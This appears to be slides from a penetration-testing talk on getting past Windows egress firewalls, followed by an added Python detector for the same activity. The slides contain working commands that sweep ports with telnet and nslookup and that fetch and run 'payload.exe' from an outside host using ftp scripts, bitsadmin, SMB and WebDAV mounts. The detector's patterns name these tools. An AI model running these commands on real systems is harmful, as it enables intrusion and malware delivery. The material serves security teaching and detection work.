9. [Egress Firewall][Windows XP & 2003]
- Bruteforce all TCP ports on Pentest with telnet
FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i")
10. [Egress Firewall][Windows XP & 2003]
- Bruteforce all TCP ports on Pentest with telnet
- Bruteforce all UDP ports on Pentest with nslookup
FOR /L %i IN (1,1,4096) DO (cmd /c "start /b telnet 1.2.3.4 %i")
FOR /L %i IN (1,1,4096) DO (cmd /c "start /b nslookup -port=%i ya.ru 1.2.3.4")
12. [Egress Firewall][Windows XP & 2003]
Impact:
~ 400 telnet.exe processes
~ 700 MB RAM is used
~ 30 min TCP scan
~ 30 min UDP scan
13. [Egress TCP][Windows Vista and Later]
- Bruteforce all TCP ports on Pentest with PowerShell
- Telnet client is disabled by design :( but if we can run it with
elevated permissions …
dism /online /enable-feature /featurename:TelnetClient
21. [FTP]
Any TCP open
- Script file must exist
- FTP client built in all Windows versions
22. [FTP]
Any TCP open
Create script file payload.txt:
open 1.2.3.4 3128
quote pasv
binary
get payload.exe c:\payload.exe
bye
(on Pentest) service start pure-ftpd
ftp -i -s:payload.txt
23. [TFTP]
69/UDP open
dism /online /enable-feature /featurename:TFTP
- Use only UDP protocol
- TFTP client is Disabled by design :( but if we can run it with
elevated permissions …
25. [Samba]
445/TCP open
+ No writable directory
+ No command output
- Proxy isn't supported
- 445/tcp only
26. [Samba]
445/TCP open
net use X: \\1.2.3.4\<share>
start x:\payload.exe
(on Pentest) service smbd start
27. [JScript/VBScript]
Any TCP open
― Encode EXE to script
― Use protocols: SMTP, FTP, LDAP …
― Script file must exist: .js, .jse, .vbs, .vbe
― JScript vs VBScript
― cscript vs wscript
39. [NSLOOKUP]
no tcp/udp open
― Get DNS Records:
• IP -> Domain name (PTR)
• Domain name -> IP (A and AAAA)
• Get TXT record (TXT)
40. [NSLOOKUP]
no tcp/udp open
Diagram: TARGET (IP 192.168.1.10) -> Firewall/NAT (internal IP 192.168.1.1, external IP 5.5.5.5) -> PENTEST (IP 1.2.3.4, name server for pentest.com). The target's internal primary DNS forwards the query and the response returns by the same path.
Remote Command Execution: get all TXT records from rce.pentest.com
48. [WebDAV] vs. [Samba]
WebDAV:
+ Any TCP open
+ Proxy
+ SSL
+ No writable directory
+ No command output
Samba:
+ No writable directory
+ No command output
- Proxy isn't supported
- 445/tcp only
49. [WebDAV][Windows XP SP3 or KB892211]
Any TCP open
net use X: <path>, where <path> is one of:
http(s)://1.2.3.4/webdav
\\1.2.3.4\webdav
\\1.2.3.4@SSL\webdav
\\1.2.3.4@SSL@5443\webdav
\\1.2.3.4@53\webdav
(on Pentest) Apache WebDAV module
50. [PowerShell]
Any TCP open
― C# code
― Any application level protocol
― Encoded commands
― Simple and it works!
52. [BITSADMIN][Windows 2003 SP1 and later]
Any TCP open
bitsadmin /transfer whatever http://1.2.3.4:80/payload.exe c:\payload.exe
(on Pentest) service apache2 start
53. [BITSADMIN][Windows 2003 SP1 and later]
Any TCP open
bitsadmin /CREATE /DOWNLOAD jobname
bitsadmin /ADDFILE jobname http://1.2.3.4/payload1.exe p1.exe
bitsadmin /ADDFILE jobname http://1.2.3.4/payload2.exe p2.exe
…
bitsadmin /RESUME jobname
bitsadmin /COMPLETE jobname
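Detection counterpart, added here and not part of the slides: the egress sweep of slides 9-12 (one parent process spawning telnet/nslookup against many distinct ports) and the built-in download tools of slides 22, 49 and 52-53 (bitsadmin, scripted ftp, WebDAV mounts) both leave a clear trace in process-creation logs. The events, field layout and thresholds below are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon event 1 / Security 4688 style),
# invented for this example: "parent_pid|image|command_line".
SAMPLE_EVENTS = r"""
4120|telnet.exe|telnet 1.2.3.4 1
4120|telnet.exe|telnet 1.2.3.4 2
4120|telnet.exe|telnet 1.2.3.4 3
4120|telnet.exe|telnet 1.2.3.4 4
4120|nslookup.exe|nslookup -port=53 ya.ru 1.2.3.4
4120|nslookup.exe|nslookup -port=54 ya.ru 1.2.3.4
4120|nslookup.exe|nslookup -port=55 ya.ru 1.2.3.4
4120|nslookup.exe|nslookup -port=56 ya.ru 1.2.3.4
7001|telnet.exe|telnet mail.example.internal 25
7002|bitsadmin.exe|bitsadmin /transfer whatever http://1.2.3.4:80/payload.exe c:\payload.exe
7003|ftp.exe|ftp -i -s:payload.txt
7004|net.exe|net use X: \\1.2.3.4@SSL@5443\webdav
7005|cmd.exe|cmd /c dir
"""

# Egress-sweep heuristic: extract the destination port each probe targets.
PORT_PATTERNS = {
    "telnet.exe": re.compile(r"telnet\s+\S+\s+(\d+)"),
    "nslookup.exe": re.compile(r"-port=(\d+)"),
}
# Built-in transfer/mount tools pointed at a remote host over HTTP, FTP script or WebDAV.
LOLBIN_PATTERNS = [
    ("bitsadmin_download", re.compile(r"bitsadmin.*(/transfer|/addfile).*https?://", re.I)),
    ("ftp_scripted", re.compile(r"\bftp\b.*-s:", re.I)),
    ("webdav_mount", re.compile(r"net use .*(https?://|@SSL|@\d+\\)", re.I)),
]

def detect(events: str, port_threshold: int = 5):
    """Return (rule, parent_pid, detail) alerts for the given event lines."""
    ports_by_parent = defaultdict(set)
    alerts = []
    for line in events.strip().splitlines():
        ppid, image, cmdline = line.split("|", 2)
        pat = PORT_PATTERNS.get(image.lower())
        if pat and (m := pat.search(cmdline)):
            ports_by_parent[ppid].add(int(m.group(1)))
        for name, lol in LOLBIN_PATTERNS:
            if lol.search(cmdline):
                alerts.append((name, ppid, cmdline))
    # A single parent touching many distinct ports is the sweep signature; one
    # legitimate telnet to port 25 (ppid 7001) stays below the threshold.
    for ppid, ports in ports_by_parent.items():
        if len(ports) >= port_threshold:
            alerts.append(("egress_port_sweep", ppid, f"{len(ports)} distinct ports"))
    return alerts
```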